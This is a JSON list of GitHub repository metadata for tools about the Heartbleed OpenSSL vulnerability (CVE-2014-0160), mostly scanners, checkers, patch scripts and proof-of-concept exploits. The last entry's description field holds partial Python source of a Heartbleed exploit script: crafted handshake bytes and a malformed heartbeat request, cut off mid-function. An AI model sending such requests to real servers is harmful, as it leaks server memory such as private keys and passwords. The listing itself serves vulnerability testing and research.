[
    {
        "id": 18537678,
        "name": "Heartbleed",
        "full_name": "FiloSottile\/Heartbleed",
        "owner": {
            "login": "FiloSottile",
            "id": 1225294,
            "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1225294?v=4",
            "html_url": "https:\/\/github.com\/FiloSottile"
        },
        "html_url": "https:\/\/github.com\/FiloSottile\/Heartbleed",
        "description": "A checker (site and tool) for CVE-2014-0160",
        "fork": false,
        "created_at": "2014-04-07T23:03:09Z",
        "updated_at": "2021-02-04T09:46:22Z",
        "pushed_at": "2016-05-07T19:35:14Z",
        "stargazers_count": 2250,
        "watchers_count": 2250,
        "forks_count": 484,
        "forks": 484,
        "watchers": 2250,
        "score": 0
    },
    {
        "id": 18545207,
        "name": "heartbleeder",
        "full_name": "titanous\/heartbleeder",
        "owner": {
            "login": "titanous",
            "id": 13026,
            "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13026?v=4",
            "html_url": "https:\/\/github.com\/titanous"
        },
        "html_url": "https:\/\/github.com\/titanous\/heartbleeder",
        "description": "OpenSSL CVE-2014-0160 Heartbleed vulnerability test",
        "fork": false,
        "created_at": "2014-04-08T04:25:23Z",
        "updated_at": "2021-01-19T15:20:37Z",
        "pushed_at": "2014-05-27T22:32:26Z",
        "stargazers_count": 452,
        "watchers_count": 452,
        "forks_count": 97,
        "forks": 97,
        "watchers": 452,
        "score": 0
    },
    {
        "id": 18551813,
        "name": "bleed",
        "full_name": "DominikTo\/bleed",
        "owner": {
            "login": "DominikTo",
            "id": 1384635,
            "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1384635?v=4",
            "html_url": "https:\/\/github.com\/DominikTo"
        },
        "html_url": "https:\/\/github.com\/DominikTo\/bleed",
        "description": "bleed is a tool to test servers for the 'Heartbleed' vulnerability (CVE-2014-0160).",
        "fork": false,
        "created_at": "2014-04-08T09:03:01Z",
        "updated_at": "2018-10-05T15:36:14Z",
        "pushed_at": "2014-04-17T13:29:34Z",
        "stargazers_count": 7,
        "watchers_count": 7,
        "forks_count": 0,
        "forks": 0,
        "watchers": 7,
        "score": 0
    },
    {
        "id": 18551976,
        "name": "heartthreader",
        "full_name": "cyphar\/heartthreader",
        "owner": {
            "login": "cyphar",
            "id": 2888411,
            "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2888411?v=4",
            "html_url": "https:\/\/github.com\/cyphar"
        },
        "html_url": "https:\/\/github.com\/cyphar\/heartthreader",
        "description": "Mass, multithreaded testing for servers against Heartbleed (CVE-2014-0160).",
        "fork": false,
        "created_at": "2014-04-08T09:08:52Z",
        "updated_at": "2019-01-09T02:36:04Z",
        "pushed_at": "2014-05-29T11:38:13Z",
        "stargazers_count": 2,
        "watchers_count": 2,
        "forks_count": 2,
        "forks": 2,
        "watchers": 2,
        "score": 0
    },
    {
        "id": 18552299,
        "name": "patch-openssl-CVE-2014-0160",
        "full_name": "jdauphant\/patch-openssl-CVE-2014-0160",
        "owner": {
            "login": "jdauphant",
            "id": 1238254,
            "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1238254?v=4",
            "html_url": "https:\/\/github.com\/jdauphant"
        },
        "html_url": "https:\/\/github.com\/jdauphant\/patch-openssl-CVE-2014-0160",
        "description": "Patch openssl #heartbleed with ansible ",
        "fork": false,
        "created_at": "2014-04-08T09:19:49Z",
        "updated_at": "2019-02-26T03:45:46Z",
        "pushed_at": "2014-12-02T12:20:51Z",
        "stargazers_count": 18,
        "watchers_count": 18,
        "forks_count": 7,
        "forks": 7,
        "watchers": 18,
        "score": 0
    },
    {
        "id": 18553786,
        "name": "heartbleed-masstest",
        "full_name": "musalbas\/heartbleed-masstest",
        "owner": {
            "login": "musalbas",
            "id": 5038597,
            "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5038597?v=4",
            "html_url": "https:\/\/github.com\/musalbas"
        },
        "html_url": "https:\/\/github.com\/musalbas\/heartbleed-masstest",
        "description": "Multi-threaded tool for scanning many hosts for CVE-2014-0160.",
        "fork": false,
        "created_at": "2014-04-08T10:10:43Z",
        "updated_at": "2020-12-07T13:05:54Z",
        "pushed_at": "2015-07-02T14:47:31Z",
        "stargazers_count": 571,
        "watchers_count": 571,
        "forks_count": 234,
        "forks": 234,
        "watchers": 571,
        "score": 0
    },
    {
        "id": 18561166,
        "name": "CVE-2014-0160-Scanner",
        "full_name": "obayesshelton\/CVE-2014-0160-Scanner",
        "owner": {
            "login": "obayesshelton",
            "id": 628720,
            "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/628720?v=4",
            "html_url": "https:\/\/github.com\/obayesshelton"
        },
        "html_url": "https:\/\/github.com\/obayesshelton\/CVE-2014-0160-Scanner",
        "description": null,
        "fork": false,
        "created_at": "2014-04-08T14:22:36Z",
        "updated_at": "2014-04-10T14:04:12Z",
        "pushed_at": "2014-04-10T14:04:12Z",
        "stargazers_count": 0,
        "watchers_count": 0,
        "forks_count": 0,
        "forks": 0,
        "watchers": 0,
        "score": 0
    },
    {
        "id": 18566360,
        "name": "pacemaker",
        "full_name": "Lekensteyn\/pacemaker",
        "owner": {
            "login": "Lekensteyn",
            "id": 164530,
            "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/164530?v=4",
            "html_url": "https:\/\/github.com\/Lekensteyn"
        },
        "html_url": "https:\/\/github.com\/Lekensteyn\/pacemaker",
        "description": "Heartbleed (CVE-2014-0160) client exploit",
        "fork": false,
        "created_at": "2014-04-08T16:41:51Z",
        "updated_at": "2021-01-19T15:14:03Z",
        "pushed_at": "2016-01-22T00:42:35Z",
        "stargazers_count": 312,
        "watchers_count": 312,
        "forks_count": 82,
        "forks": 82,
        "watchers": 312,
        "score": 0
    },
    {
        "id": 18574769,
        "name": "openmagic",
        "full_name": "isgroup-srl\/openmagic",
        "owner": {
            "login": "isgroup-srl",
            "id": 3922436,
            "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3922436?v=4",
            "html_url": "https:\/\/github.com\/isgroup-srl"
        },
        "html_url": "https:\/\/github.com\/isgroup-srl\/openmagic",
        "description": "OpenSSL TLS heartbeat read overrun (CVE-2014-0160)",
        "fork": false,
        "created_at": "2014-04-08T20:58:26Z",
        "updated_at": "2019-10-02T13:26:04Z",
        "pushed_at": "2014-04-11T02:40:46Z",
        "stargazers_count": 38,
        "watchers_count": 38,
        "forks_count": 9,
        "forks": 9,
        "watchers": 38,
        "score": 0
    },
    {
        "id": 18577198,
        "name": "CVE-2014-0160",
        "full_name": "fb1h2s\/CVE-2014-0160",
        "owner": {
            "login": "fb1h2s",
            "id": 2658510,
            "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2658510?v=4",
            "html_url": "https:\/\/github.com\/fb1h2s"
        },
        "html_url": "https:\/\/github.com\/fb1h2s\/CVE-2014-0160",
        "description": "openssl Heart Bleed Exploit: CVE-2014-0160 Mass Security Auditor",
        "fork": false,
        "created_at": "2014-04-08T22:29:55Z",
        "updated_at": "2014-04-08T22:29:55Z",
        "pushed_at": "2014-04-08T22:29:55Z",
        "stargazers_count": 0,
        "watchers_count": 0,
        "forks_count": 0,
        "forks": 0,
        "watchers": 0,
        "score": 0
    },
    {
        "id": 18578735,
        "name": "ssl-heartbleed.nse",
        "full_name": "takeshixx\/ssl-heartbleed.nse",
        "owner": {
            "login": "takeshixx",
            "id": 5837896,
            "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5837896?v=4",
            "html_url": "https:\/\/github.com\/takeshixx"
        },
        "html_url": "https:\/\/github.com\/takeshixx\/ssl-heartbleed.nse",
        "description": "Nmap NSE script that discovers\/exploits Heartbleed\/CVE-2014-0160",
        "fork": false,
        "created_at": "2014-04-08T23:39:17Z",
        "updated_at": "2020-10-20T11:08:30Z",
        "pushed_at": "2014-04-13T11:10:34Z",
        "stargazers_count": 0,
        "watchers_count": 0,
        "forks_count": 0,
        "forks": 0,
        "watchers": 0,
        "score": 0
    },
    {
        "id": 18580081,
        "name": "heartbleedchecker-chrome",
        "full_name": "roganartu\/heartbleedchecker-chrome",
        "owner": {
            "login": "roganartu",
            "id": 1133705,
            "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1133705?v=4",
            "html_url": "https:\/\/github.com\/roganartu"
        },
        "html_url": "https:\/\/github.com\/roganartu\/heartbleedchecker-chrome",
        "description": "Chrome extension that automatically checks visited sites for vulnerability to OpenSSL CVE-2014-0160",
        "fork": false,
        "created_at": "2014-04-09T00:41:04Z",
        "updated_at": "2014-04-09T01:05:21Z",
        "pushed_at": "2014-04-09T01:05:20Z",
        "stargazers_count": 0,
        "watchers_count": 0,
        "forks_count": 0,
        "forks": 0,
        "watchers": 0,
        "score": 0
    },
    {
        "id": 18586339,
        "name": "heartbleed",
        "full_name": "zouguangxian\/heartbleed",
        "owner": {
            "login": "zouguangxian",
            "id": 863281,
            "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/863281?v=4",
            "html_url": "https:\/\/github.com\/zouguangxian"
        },
        "html_url": "https:\/\/github.com\/zouguangxian\/heartbleed",
        "description": "Checks for vulnerabilities: CVE-2014-0160 ",
        "fork": false,
        "created_at": "2014-04-09T05:29:36Z",
        "updated_at": "2014-04-10T01:49:59Z",
        "pushed_at": "2014-04-10T01:49:59Z",
        "stargazers_count": 1,
        "watchers_count": 1,
        "forks_count": 2,
        "forks": 2,
        "watchers": 1,
        "score": 0
    },
    {
        "id": 18603489,
        "name": "heartbleed-poc",
        "full_name": "sensepost\/heartbleed-poc",
        "owner": {
            "login": "sensepost",
            "id": 1193973,
            "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1193973?v=4",
            "html_url": "https:\/\/github.com\/sensepost"
        },
        "html_url": "https:\/\/github.com\/sensepost\/heartbleed-poc",
        "description": "Test for SSL heartbeat vulnerability (CVE-2014-0160)",
        "fork": false,
        "created_at": "2014-04-09T15:59:14Z",
        "updated_at": "2021-02-02T00:07:29Z",
        "pushed_at": "2014-07-10T21:17:22Z",
        "stargazers_count": 127,
        "watchers_count": 127,
        "forks_count": 77,
        "forks": 77,
        "watchers": 127,
        "score": 0
    },
    {
        "id": 18613807,
        "name": "heartbleed-extention",
        "full_name": "proactiveRISK\/heartbleed-extention",
        "owner": {
            "login": "proactiveRISK",
            "id": 7243071,
            "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7243071?v=4",
            "html_url": "https:\/\/github.com\/proactiveRISK"
        },
        "html_url": "https:\/\/github.com\/proactiveRISK\/heartbleed-extention",
        "description": "A firefox extension and checker for CVE-2014-0160",
        "fork": false,
        "created_at": "2014-04-09T21:20:56Z",
        "updated_at": "2015-03-07T23:34:52Z",
        "pushed_at": "2014-04-11T15:34:20Z",
        "stargazers_count": 1,
        "watchers_count": 1,
        "forks_count": 1,
        "forks": 1,
        "watchers": 1,
        "score": 0
    },
    {
        "id": 18621109,
        "name": "coronary",
        "full_name": "amerine\/coronary",
        "owner": {
            "login": "amerine",
            "id": 1016,
            "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1016?v=4",
            "html_url": "https:\/\/github.com\/amerine"
        },
        "html_url": "https:\/\/github.com\/amerine\/coronary",
        "description": "Test CIDR blocks for CVE-2014-0160\/Heartbleed",
        "fork": false,
        "created_at": "2014-04-10T02:28:05Z",
        "updated_at": "2014-04-10T02:41:44Z",
        "pushed_at": "2014-04-10T02:41:44Z",
        "stargazers_count": 0,
        "watchers_count": 0,
        "forks_count": 1,
        "forks": 1,
        "watchers": 0,
        "score": 0
    },
    {
        "id": 18621604,
        "name": "CVE-2014-0160",
        "full_name": "0x90\/CVE-2014-0160",
        "owner": {
            "login": "0x90",
            "id": 806042,
            "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/806042?v=4",
            "html_url": "https:\/\/github.com\/0x90"
        },
        "html_url": "https:\/\/github.com\/0x90\/CVE-2014-0160",
        "description": "Heartbleed variants",
        "fork": false,
        "created_at": "2014-04-10T02:47:43Z",
        "updated_at": "2019-05-15T09:18:49Z",
        "pushed_at": "2014-05-09T15:51:53Z",
        "stargazers_count": 6,
        "watchers_count": 6,
        "forks_count": 11,
        "forks": 11,
        "watchers": 6,
        "score": 0
    },
    {
        "id": 18623918,
        "name": "CVE-2014-0160",
        "full_name": "ice-security88\/CVE-2014-0160",
        "owner": {
            "login": "ice-security88",
            "id": 7246782,
            "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7246782?v=4",
            "html_url": "https:\/\/github.com\/ice-security88"
        },
        "html_url": "https:\/\/github.com\/ice-security88\/CVE-2014-0160",
        "description": null,
        "fork": false,
        "created_at": "2014-04-10T04:27:10Z",
        "updated_at": "2014-04-10T04:27:10Z",
        "pushed_at": "2014-04-10T04:27:10Z",
        "stargazers_count": 0,
        "watchers_count": 0,
        "forks_count": 0,
        "forks": 0,
        "watchers": 0,
        "score": 0
    },
    {
        "id": 18634299,
        "name": "HeartBleed-Vulnerability-Checker",
        "full_name": "waqasjamal-zz\/HeartBleed-Vulnerability-Checker",
        "owner": {
            "login": "waqasjamal-zz",
            "id": 2502430,
            "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2502430?v=4",
            "html_url": "https:\/\/github.com\/waqasjamal-zz"
        },
        "html_url": "https:\/\/github.com\/waqasjamal-zz\/HeartBleed-Vulnerability-Checker",
        "description": "This repo contains a script to automatically test sites for vulnerability to the Heartbleed Bug (CVE-2014-0160) based on the input file for the urls.",
        "fork": false,
        "created_at": "2014-04-10T11:42:33Z",
        "updated_at": "2014-04-11T11:41:14Z",
        "pushed_at": "2014-04-11T11:41:17Z",
        "stargazers_count": 1,
        "watchers_count": 1,
        "forks_count": 1,
        "forks": 1,
        "watchers": 1,
        "score": 0
    },
    {
        "id": 18644790,
        "name": "knockbleed",
        "full_name": "siddolo\/knockbleed",
        "owner": {
            "login": "siddolo",
            "id": 2439981,
            "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2439981?v=4",
            "html_url": "https:\/\/github.com\/siddolo"
        },
        "html_url": "https:\/\/github.com\/siddolo\/knockbleed",
        "description": "CVE-2014-0160 mass test against subdomains",
        "fork": false,
        "created_at": "2014-04-10T17:12:53Z",
        "updated_at": "2014-04-10T17:48:36Z",
        "pushed_at": "2014-04-10T17:48:39Z",
        "stargazers_count": 0,
        "watchers_count": 0,
        "forks_count": 0,
        "forks": 0,
        "watchers": 0,
        "score": 0
    },
    {
        "id": 18649488,
        "name": "openssl-heartbleed-fix",
        "full_name": "sammyfung\/openssl-heartbleed-fix",
        "owner": {
            "login": "sammyfung",
            "id": 50470,
            "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50470?v=4",
            "html_url": "https:\/\/github.com\/sammyfung"
        },
        "html_url": "https:\/\/github.com\/sammyfung\/openssl-heartbleed-fix",
        "description": "OpenSSL Heartbleed (CVE-2014-0160) Fix script",
        "fork": false,
        "created_at": "2014-04-10T19:47:42Z",
        "updated_at": "2014-06-11T14:34:33Z",
        "pushed_at": "2014-04-10T20:11:58Z",
        "stargazers_count": 1,
        "watchers_count": 1,
        "forks_count": 0,
        "forks": 0,
        "watchers": 1,
        "score": 0
    },
    {
        "id": 18676804,
        "name": "heartbleed-test",
        "full_name": "a0726h77\/heartbleed-test",
        "owner": {
            "login": "a0726h77",
            "id": 127018,
            "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/127018?v=4",
            "html_url": "https:\/\/github.com\/a0726h77"
        },
        "html_url": "https:\/\/github.com\/a0726h77\/heartbleed-test",
        "description": "CVE-2014-0160 scanner",
        "fork": false,
        "created_at": "2014-04-11T14:24:54Z",
        "updated_at": "2014-04-12T13:29:50Z",
        "pushed_at": "2014-04-12T13:29:53Z",
        "stargazers_count": 0,
        "watchers_count": 0,
        "forks_count": 0,
        "forks": 0,
        "watchers": 0,
        "score": 0
    },
    {
        "id": 18705580,
        "name": "heartbleed-dtls",
        "full_name": "hreese\/heartbleed-dtls",
        "owner": {
            "login": "hreese",
            "id": 892400,
            "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/892400?v=4",
            "html_url": "https:\/\/github.com\/hreese"
        },
        "html_url": "https:\/\/github.com\/hreese\/heartbleed-dtls",
        "description": "POC for CVE-2014-0160 (Heartbleed) for DTLS",
        "fork": false,
        "created_at": "2014-04-12T14:13:36Z",
        "updated_at": "2019-08-13T15:39:32Z",
        "pushed_at": "2016-03-26T12:21:03Z",
        "stargazers_count": 6,
        "watchers_count": 6,
        "forks_count": 0,
        "forks": 0,
        "watchers": 6,
        "score": 0
    },
    {
        "id": 18714630,
        "name": "bleeding_onions",
        "full_name": "wwwiretap\/bleeding_onions",
        "owner": {
            "login": "wwwiretap",
            "id": 210109,
            "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/210109?v=4",
            "html_url": "https:\/\/github.com\/wwwiretap"
        },
        "html_url": "https:\/\/github.com\/wwwiretap\/bleeding_onions",
        "description": "Script to find Exit and Guard nodes in the Tor Network, that are still suffering from CVE-2014-0160",
        "fork": false,
        "created_at": "2014-04-12T21:04:55Z",
        "updated_at": "2014-09-09T17:32:17Z",
        "pushed_at": "2014-04-13T14:57:20Z",
        "stargazers_count": 6,
        "watchers_count": 6,
        "forks_count": 0,
        "forks": 0,
        "watchers": 6,
        "score": 0
    },
    {
        "id": 18722665,
        "name": "heatbleeding",
        "full_name": "idkqh7\/heatbleeding",
        "owner": {
            "login": "idkqh7",
            "id": 2221840,
            "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2221840?v=4",
            "html_url": "https:\/\/github.com\/idkqh7"
        },
        "html_url": "https:\/\/github.com\/idkqh7\/heatbleeding",
        "description": "Test script for test 1Password database for SSL Hea(r)t Bleeding (CVE-2014-0160)",
        "fork": false,
        "created_at": "2014-04-13T05:52:43Z",
        "updated_at": "2018-03-04T07:22:19Z",
        "pushed_at": "2014-04-09T16:36:52Z",
        "stargazers_count": 0,
        "watchers_count": 0,
        "forks_count": 0,
        "forks": 0,
        "watchers": 0,
        "score": 0
    },
    {
        "id": 18728436,
        "name": "ssl-heartbleed.nse",
        "full_name": "GeeksXtreme\/ssl-heartbleed.nse",
        "owner": {
            "login": "GeeksXtreme",
            "id": 5917335,
            "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5917335?v=4",
            "html_url": "https:\/\/github.com\/GeeksXtreme"
        },
        "html_url": "https:\/\/github.com\/GeeksXtreme\/ssl-heartbleed.nse",
        "description": "Nmap NSE script that discovers\/exploits Heartbleed\/CVE-2014-0160.",
        "fork": false,
        "created_at": "2014-04-13T12:14:29Z",
        "updated_at": "2020-04-07T08:00:25Z",
        "pushed_at": "2014-04-13T11:10:34Z",
        "stargazers_count": 1,
        "watchers_count": 1,
        "forks_count": 4,
        "forks": 4,
        "watchers": 1,
        "score": 0
    },
    {
        "id": 18737537,
        "name": "heartbleed",
        "full_name": "xlucas\/heartbleed",
        "owner": {
            "login": "xlucas",
            "id": 2470398,
            "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2470398?v=4",
            "html_url": "https:\/\/github.com\/xlucas"
        },
        "html_url": "https:\/\/github.com\/xlucas\/heartbleed",
        "description": "A research tool designed to check for OpenSSL CVE-2014-0160 vulnerability",
        "fork": false,
        "created_at": "2014-04-13T19:18:32Z",
        "updated_at": "2018-10-07T00:48:31Z",
        "pushed_at": "2015-05-02T08:25:20Z",
        "stargazers_count": 1,
        "watchers_count": 1,
        "forks_count": 0,
        "forks": 0,
        "watchers": 1,
        "score": 0
    },
    {
        "id": 18794584,
        "name": "-Heartbleed-",
        "full_name": "indiw0rm\/-Heartbleed-",
        "owner": {
            "login": "indiw0rm",
            "id": 7300510,
            "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7300510?v=4",
            "html_url": "https:\/\/github.com\/indiw0rm"
        },
        "html_url": "https:\/\/github.com\/indiw0rm\/-Heartbleed-",
        "description": "A checker (site and tool) for CVE-2014-0160: ",
        "fork": false,
        "created_at": "2014-04-15T09:30:40Z",
        "updated_at": "2014-04-15T09:30:40Z",
        "pushed_at": "2014-04-15T09:30:40Z",
        "stargazers_count": 0,
        "watchers_count": 0,
        "forks_count": 0,
        "forks": 0,
        "watchers": 0,
        "score": 0
    },
    {
        "id": 18802435,
        "name": "heartbleed-tools",
        "full_name": "einaros\/heartbleed-tools",
        "owner": {
            "login": "einaros",
            "id": 394360,
            "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/394360?v=4",
            "html_url": "https:\/\/github.com\/einaros"
        },
        "html_url": "https:\/\/github.com\/einaros\/heartbleed-tools",
        "description": "OpenSSL Heartbleed (CVE-2014-0160) vulnerability scanner, data miner and RSA key-restore tools.",
        "fork": false,
        "created_at": "2014-04-15T14:09:54Z",
        "updated_at": "2020-03-30T21:42:41Z",
        "pushed_at": "2014-06-18T11:54:32Z",
        "stargazers_count": 91,
        "watchers_count": 91,
        "forks_count": 21,
        "forks": 21,
        "watchers": 91,
        "score": 0
    },
    {
        "id": 18818122,
        "name": "Heartbleed",
        "full_name": "mozilla-services\/Heartbleed",
        "owner": {
            "login": "mozilla-services",
            "id": 1066228,
            "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1066228?v=4",
            "html_url": "https:\/\/github.com\/mozilla-services"
        },
        "html_url": "https:\/\/github.com\/mozilla-services\/Heartbleed",
        "description": "A checker (site and tool) for CVE-2014-0160",
        "fork": false,
        "created_at": "2014-04-15T22:22:18Z",
        "updated_at": "2019-05-30T01:17:07Z",
        "pushed_at": "2019-03-27T19:51:32Z",
        "stargazers_count": 3,
        "watchers_count": 3,
        "forks_count": 4,
        "forks": 4,
        "watchers": 3,
        "score": 0
    },
    {
        "id": 18935164,
        "name": "heartbleed.js",
        "full_name": "yryz\/heartbleed.js",
        "owner": {
            "login": "yryz",
            "id": 1646732,
            "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1646732?v=4",
            "html_url": "https:\/\/github.com\/yryz"
        },
        "html_url": "https:\/\/github.com\/yryz\/heartbleed.js",
        "description": "openssl Heartbleed bug(CVE-2014-0160) check for Node.js ",
        "fork": false,
        "created_at": "2014-04-19T06:20:44Z",
        "updated_at": "2018-07-12T01:37:36Z",
        "pushed_at": "2015-04-30T09:25:33Z",
        "stargazers_count": 5,
        "watchers_count": 5,
        "forks_count": 1,
        "forks": 1,
        "watchers": 5,
        "score": 0
    },
    {
        "id": 19339521,
        "name": "MaltegoHeartbleed",
        "full_name": "DisK0nn3cT\/MaltegoHeartbleed",
        "owner": {
            "login": "DisK0nn3cT",
            "id": 727064,
            "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/727064?v=4",
            "html_url": "https:\/\/github.com\/DisK0nn3cT"
        },
        "html_url": "https:\/\/github.com\/DisK0nn3cT\/MaltegoHeartbleed",
        "description": "Maltego transform to detect the OpenSSL Heartbleed vulnerability (CVE-2014-0160)",
        "fork": false,
        "created_at": "2014-05-01T08:28:45Z",
        "updated_at": "2020-07-12T14:14:24Z",
        "pushed_at": "2014-05-01T08:47:16Z",
        "stargazers_count": 15,
        "watchers_count": 15,
        "forks_count": 7,
        "forks": 7,
        "watchers": 15,
        "score": 0
    },
    {
        "id": 19408970,
        "name": "HeartLeak",
        "full_name": "OffensivePython\/HeartLeak",
        "owner": {
            "login": "OffensivePython",
            "id": 6576532,
            "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6576532?v=4",
            "html_url": "https:\/\/github.com\/OffensivePython"
        },
        "html_url": "https:\/\/github.com\/OffensivePython\/HeartLeak",
        "description": "CVE-2014-0160 (Heartbeat Buffer over-read bug)",
        "fork": false,
        "created_at": "2014-05-03T18:08:27Z",
        "updated_at": "2020-04-05T15:18:34Z",
        "pushed_at": "2014-05-03T18:14:49Z",
        "stargazers_count": 16,
        "watchers_count": 16,
        "forks_count": 10,
        "forks": 10,
        "watchers": 16,
        "score": 0
    },
    {
        "id": 25109038,
        "name": "ssl_scanner",
        "full_name": "vortextube\/ssl_scanner",
        "owner": {
            "login": "vortextube",
            "id": 7092728,
            "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7092728?v=4",
            "html_url": "https:\/\/github.com\/vortextube"
        },
        "html_url": "https:\/\/github.com\/vortextube\/ssl_scanner",
        "description": "Heartbleed (CVE-2014-0160) SSLv3 Scanner",
        "fork": false,
        "created_at": "2014-10-12T05:13:06Z",
        "updated_at": "2017-01-18T17:52:53Z",
        "pushed_at": "2014-10-12T05:22:07Z",
        "stargazers_count": 1,
        "watchers_count": 1,
        "forks_count": 1,
        "forks": 1,
        "watchers": 1,
        "score": 0
    },
    {
        "id": 31863201,
        "name": "heartbleed-PoC",
        "full_name": "mpgn\/heartbleed-PoC",
        "owner": {
            "login": "mpgn",
            "id": 5891788,
            "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5891788?v=4",
            "html_url": "https:\/\/github.com\/mpgn"
        },
        "html_url": "https:\/\/github.com\/mpgn\/heartbleed-PoC",
        "description": ":broken_heart: Hearbleed exploit to retrieve sensitive information CVE-2014-0160 :broken_heart:",
        "fork": false,
        "created_at": "2015-03-08T19:54:33Z",
        "updated_at": "2021-01-19T15:16:02Z",
        "pushed_at": "2015-03-15T17:18:56Z",
        "stargazers_count": 55,
        "watchers_count": 55,
        "forks_count": 36,
        "forks": 36,
        "watchers": 55,
        "score": 0
    },
    {
        "id": 33456758,
        "name": "heartbleed.py",
        "full_name": "xanas\/heartbleed.py",
        "owner": {
            "login": "xanas",
            "id": 11810462,
            "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11810462?v=4",
            "html_url": "https:\/\/github.com\/xanas"
        },
        "html_url": "https:\/\/github.com\/xanas\/heartbleed.py",
        "description": "#!\/usr\/bin\/python  # Modified by Travis Lee # -changed output to display text only instead of hexdump and made it easier to read # -added option to specify number of times to connect to server (to get more data) # -added option to specify TLS version # -added option to send STARTTLS command for use with SMTP\/POP\/IMAP\/FTP\/etc...  # -added option to specify an input file of multiple hosts, line delimited, with or without a port specified (host:port) # -added option to have verbose output # -added capability to automatically check if STARTTLS\/STLS\/AUTH TLS is supported when smtp\/pop\/imap\/ftp ports are entered and automatically send appropriate command   # Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org) # The author disclaims copyright to this source code.  import sys import struct import socket import time import select import re from optparse import OptionParser  options = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)') options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)') options.add_option('-n', '--num', type='int', default=1, help='Number of times to connect\/loop (default: 1)') options.add_option('-t', '--tls', type='int', default=1, help='Specify TLS version: 0 = 1.0, 1 = 1.1, 2 = 1.2 (default: 1)') options.add_option('-s', '--starttls', action=\"store_true\", dest=\"starttls\", help='Issue STARTTLS command for SMTP\/POP\/IMAP\/FTP\/etc...') options.add_option('-f', '--filein', type='str', help='Specify input file, line delimited, IPs or hostnames or IP:port or hostname:port') options.add_option('-v', '--verbose', action=\"store_true\", dest=\"verbose\", help='Enable verbose output')  opts, args = options.parse_args()  def h2bin(x):     return x.replace(' ', '').replace('\\n', '').decode('hex')  hello = h2bin(''' 16 03 02 00  dc 01 00 00 d8 03 02 53 43 5b 90 9d 9b 72 0b bc  0c bc 2b 92 a8 48 97 cf bd 39 04 cc 16 0a 85 03  90 9f 77 04 33 d4 de 00 00 66 c0 14 c0 0a c0 22  c0 21 00 39 00 38 00 88 00 87 c0 0f c0 05 00 35  00 84 c0 12 c0 08 c0 1c c0 1b 00 16 00 13 c0 0d  c0 03 00 0a c0 13 c0 09 c0 1f c0 1e 00 33 00 32  00 9a 00 99 00 45 00 44 c0 0e c0 04 00 2f 00 96  00 41 c0 11 c0 07 c0 0c c0 02 00 05 00 04 00 15  00 12 00 09 00 14 00 11 00 08 00 06 00 03 00 ff  01 00 00 49 00 0b 00 04 03 00 01 02 00 0a 00 34  00 32 00 0e 00 0d 00 19 00 0b 00 0c 00 18 00 09  00 0a 00 16 00 17 00 08 00 06 00 07 00 14 00 15  00 04 00 05 00 12 00 13 00 01 00 02 00 03 00 0f  00 10 00 11 00 23 00 00 00 0f 00 01 01                                   ''')  # set TLS version if opts.tls == 0:     hb = h2bin('''18 03 01 00 03 01 40 00''') elif opts.tls == 1:     hb = h2bin('''18 03 02 00 03 01 40 00''') elif opts.tls == 2:     hb = h2bin('''18 03 03 00 03 01 40 00''') else:     hb = h2bin('''18 03 02 00 03 01 40 00''')   def hexdump(s):     pdat = ''     for b in xrange(0, len(s), 16):         lin = [c for c in s[b : b + 16]]         #hxdat = ' '.join('%02X' % ord(c) for c in lin)         pdat += ''.join((c if ((32 <= ord(c) <= 126) or (ord(c) == 10) or (ord(c) == 13)) else '.' )for c in lin) \t#print '  %04x: %-48s %s' % (b, hxdat, pdat) \tpdat = re.sub(r'([.]{50,})', '', pdat)     return pdat  def recvall(s, length, timeout=5):     try:         endtime = time.time() + timeout         rdata = ''         remain = length         while remain > 0:             rtime = endtime - time.time()              if rtime < 0:                 return None             r, w, e = select.select([s], [], [], 5)             if s in r:                 data = s.recv(remain)                 # EOF?                 if not data:                     return None                 rdata += data                 remain -= len(data)         return rdata              except:        print \"Error receiving data: \", sys.exc_info()[0]  def recvmsg(s):     hdr = recvall(s, 5)     if hdr is None:         print 'Unexpected EOF receiving record header - server closed connection'         return None, None, None     typ, ver, ln = struct.unpack('>BHH', hdr)     pay = recvall(s, ln, 10)     if pay is None:         print 'Unexpected EOF receiving record payload - server closed connection'         return None, None, None     if opts.verbose:         print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay))     return typ, ver, pay  def hit_hb(s, targ):     s.send(hb)     while True:         typ, ver, pay = recvmsg(s)         if typ is None:             print 'No heartbeat response received, server likely not vulnerable'             return 